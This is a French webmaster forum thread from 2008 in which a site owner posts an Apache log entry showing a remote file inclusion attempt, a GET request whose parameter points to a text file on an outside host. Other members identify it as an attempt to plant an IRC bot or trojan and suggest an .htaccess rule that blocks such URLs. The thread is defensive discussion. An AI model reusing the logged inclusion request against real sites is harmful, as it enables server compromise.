Un p'tit malin...
8 messages
• Page 1 sur 1
Consultez la formation à Google Analytics de WebRankInfo / Ranking Metrics
- csseur
- WRInaute discret
- Messages: 85
- Inscription: 21 Mai 2006
Un p'tit malin...
le Lun Mar 03, 2008 23:36
Hello,
Je viens de découvrir dans mes logs des choses comme:
Qu'a t'il voulu faire exactement avec son fichier alls.txt ?
Aucuns risques si allow_url_fopen est désactivé ?
++
Je viens de découvrir dans mes logs des choses comme:
- Code: Tout sélectionner
88.191.36.35 - - [03/Mar/2008:23:14:27 +0100] "GET //index.php?Base=http://svchost25.site.voila.fr/alls.txt?? HTTP/1.1" 403 211 "-" "libwww-perl/5.803"
Qu'a t'il voulu faire exactement avec son fichier alls.txt ?
Aucuns risques si allow_url_fopen est désactivé ?
++
-
biddybulle - WRInaute passionné
- Messages: 1619
- Inscription: 30 Mai 2005
le Lun Mar 03, 2008 23:51
installer un serveur IRC
- capleton59
- WRInaute occasionnel
- Messages: 302
- Inscription: 24 Avr 2005
le Mar Mar 04, 2008 8:36
oui c'est clairement une tentative de piratage 
- Hartas
- WRInaute discret
- Messages: 66
- Inscription: 12 Nov 2006
le Mar Mar 04, 2008 12:25
je confirme l'irc. D'ailleurs en ouvrant -http://svchost25.site.voila.fr/404.txt j'ai McAfee qui s'est excité ->cheval de troie
question bête pourquoi faire un piratage pour installer un serveur IRC ? L'intérêt n'est-il qu'au niveau du DL de fichier "tipiak", ou "la vérité est ailleurs"?
question bête pourquoi faire un piratage pour installer un serveur IRC ? L'intérêt n'est-il qu'au niveau du DL de fichier "tipiak", ou "la vérité est ailleurs"?
- csseur
- WRInaute discret
- Messages: 85
- Inscription: 21 Mai 2006
le Mar Mar 04, 2008 12:57
J'ai contacté voila (là ou ya la page), dédibox (la machine avec laquelle il appelle le script) et wordpress.com (monsieur a un blog sur lequel il montre des hacks screenshots à l'appui..).
Je sais qu'il y en a des milliers comme lui, mais bon
Sinon, existe-t'il un script pour être averti par email en temps réel de certaines requêtes? (vec apache2/linux) ?
++
Je sais qu'il y en a des milliers comme lui, mais bon
Sinon, existe-t'il un script pour être averti par email en temps réel de certaines requêtes? (vec apache2/linux) ?
++
- darkjukka
- WRInaute impliqué
- Messages: 669
- Inscription: 28 Avr 2007
le Mar Mar 04, 2008 13:04
J'en reçois pas mal par jours des tentatives de ce genre sur mon site, à croire que les gens ont que ça à foutre 
M'enfin vu que je suis averti des 404 je vois ce que ces petits malins essaye de faire (si je prenais le temps, je boquerais les IP tiens ^^)
M'enfin vu que je suis averti des 404 je vois ce que ces petits malins essaye de faire (si je prenais le temps, je boquerais les IP tiens ^^)
-
Leonick - WRInaute accro
- Messages: 19598
- Inscription: 8 Aoû 2004
le Mar Mar 04, 2008 13:10
si tu n'utilises pas ce type d'url, inclusions externes, il suffit de les bloquer avec htaccess
- Code: Tout sélectionner
RewriteEngine on
RewriteRule (_vti_bin|http) - [NC,F,L]
8 messages
• Page 1 sur 1
Formation recommandée sur ce thème :
Formation Google Analytics : en 2 jours, apprenez comment exploiter l'essentiel des possibilités de l'outil de mesure d'audience de Google. Formation animée par les experts Google Analytics de Ranking Metrics.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- Un tit bug
- Css un tit pb avec
- Un tit merci à Google
- Tit problème de float:left sous FireFox...
- Nombre de caracteres entre les balises <title></tit
- robots.txt ... c'est possible d'avoir un tit topo vite fait?
- Besoin d'un tit coup de pouce pour redirection 301 massive
- Referencer eco-malin
- Google devient plus malin ?
- site hacké... c'est malin...
- Le blog officiel de Google Checkout - 12-08-2006
- Google TV : mariage de la télévision et du web - 05-10-2010
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités
Contact
Confidentialité